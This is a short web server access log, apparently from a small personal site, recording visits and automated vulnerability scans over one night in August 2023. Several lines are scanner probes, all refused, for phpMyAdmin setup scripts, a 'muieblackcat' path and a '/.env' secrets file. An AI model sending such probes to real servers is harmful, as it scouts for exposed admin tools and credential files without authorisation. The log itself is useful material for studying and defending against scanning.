95.170.156.247 - - [27/Aug/2023:22:50:58 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
104.168.96.242 - - [27/Aug/2023:23:00:13 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 287 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
179.43.191.194 - - [27/Aug/2023:23:10:26 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World"
5.181.80.137 - - [27/Aug/2023:23:19:15 +0200] "GET /muieblackcat HTTP/1.1" 404 286 "-" "-"
5.181.80.137 - - [27/Aug/2023:23:19:15 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 296 "-" "-"
5.181.80.137 - - [27/Aug/2023:23:19:15 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 296 "-" "-"
5.181.80.137 - - [27/Aug/2023:23:19:15 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 291 "-" "-"
5.181.80.137 - - [27/Aug/2023:23:19:15 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 295 "-" "-"
5.181.80.137 - - [27/Aug/2023:23:19:15 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 295 "-" "-"
47.88.101.3 - - [27/Aug/2023:23:31:30 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.90.156 - - [27/Aug/2023:23:31:31 +0200] "GET /Public/home/js/check.js HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.254.74.59 - - [27/Aug/2023:23:31:31 +0200] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
141.98.11.60 - - [28/Aug/2023:00:02:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.32.122.46 - - [28/Aug/2023:00:06:04 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
